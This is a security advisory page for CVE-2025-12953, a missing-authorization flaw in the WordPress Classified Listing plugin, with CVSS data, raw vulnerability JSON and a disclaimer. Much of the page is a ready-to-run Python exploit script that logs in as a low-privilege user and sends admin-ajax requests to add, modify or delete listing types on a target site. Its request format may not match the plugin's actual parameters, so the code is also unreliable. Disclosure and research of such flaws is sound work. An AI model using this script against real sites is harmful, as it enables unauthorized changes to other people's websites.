Security Vulnerability Report
δΈ­ζ–‡
CVE-2025-12953 CVSS 4.3 MEDIUM

CVE-2025-12953

Published: 2025-11-11 11:15:35
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

The Classified Listing – AI-Powered Classified ads & Business Directory Plugin plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the "rtcl_ajax_add_listing_type", "rtcl_ajax_update_listing_type", and "rtcl_ajax_delete_listing_type" function in all versions up to, and including, 5.2.0. This makes it possible for authenticated attackers, with subscriber level access and above, to add, update, or delete listing types.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Classified Listing Plugin <= 5.2.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 """ CVE-2025-12953 PoC - WordPress Classified Listing Plugin Authorization Bypass This PoC demonstrates the missing capability check vulnerability in the Classified Listing plugin. """ import requests import sys from urllib.parse import urljoin def exploit_cve_2025_12953(target_url, username, password, action='add'): """ Exploit the missing authorization vulnerability in WordPress Classified Listing plugin. Args: target_url: Base URL of the WordPress site username: WordPress username (subscriber level or higher) password: WordPress password action: 'add', 'update', or 'delete' """ # Step 1: Authenticate to WordPress session = requests.Session() login_url = urljoin(target_url, 'wp-login.php') login_data = { 'log': username, 'pwd': password, 'wp-submit': 'Log In', 'redirect_to': target_url, 'testcookie': '1' } print(f"[*] Authenticating as {username}...") response = session.post(login_url, data=login_data, allow_redirects=True) if 'wordpress_logged_in' not in str(session.cookies): print("[-] Authentication failed") return False print("[+] Authentication successful") # Step 2: Prepare AJAX request based on action ajax_url = urljoin(target_url, 'wp-admin/admin-ajax.php') if action == 'add': # Add a new listing type payload = { 'action': 'rtcl_ajax_add_listing_type', 'listing_type': { 'name': 'Malicious Type', 'slug': 'malicious-type', 'description': 'Injected by CVE-2025-12953' } } print("[*] Adding malicious listing type...") elif action == 'update': # Update existing listing type (replace ID with actual) payload = { 'action': 'rtcl_ajax_update_listing_type', 'listing_type': { 'id': 1, 'name': 'Modified Type', 'description': 'Modified by CVE-2025-12953' } } print("[*] Updating listing type...") elif action == 'delete': # Delete listing type (replace ID with actual) payload = { 'action': 'rtcl_ajax_delete_listing_type', 'listing_type_id': 1 } print("[*] Deleting listing type...") else: print("[-] Invalid action") return False # Step 3: Send AJAX request without admin privileges print("[*] Sending AJAX request (subscriber-level access)...") response = session.post(ajax_url, data=payload) if response.status_code == 200: print(f"[+] Request sent successfully") print(f"[+] Response: {response.text[:200]}") return True else: print(f"[-] Request failed with status {response.status_code}") return False if __name__ == '__main__': if len(sys.argv) < 5: print(f"Usage: {sys.argv[0]} <target_url> <username> <password> <action>") print("Actions: add, update, delete") sys.exit(1) target = sys.argv[1] user = sys.argv[2] pwd = sys.argv[3] action = sys.argv[4] exploit_cve_2025_12953(target, user, pwd, action)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-12953", "sourceIdentifier": "[email protected]", "published": "2025-11-11T11:15:35.230", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Classified Listing – AI-Powered Classified ads & Business Directory Plugin plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the \"rtcl_ajax_add_listing_type\", \"rtcl_ajax_update_listing_type\", and \"rtcl_ajax_delete_listing_type\" function in all versions up to, and including, 5.2.0. This makes it possible for authenticated attackers, with subscriber level access and above, to add, update, or delete listing types."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset/3389342/classified-listing/trunk/app/Controllers/Ajax/AjaxListingType.php", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/811f147e-5829-4f7e-91d8-9dba780950d5?source=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.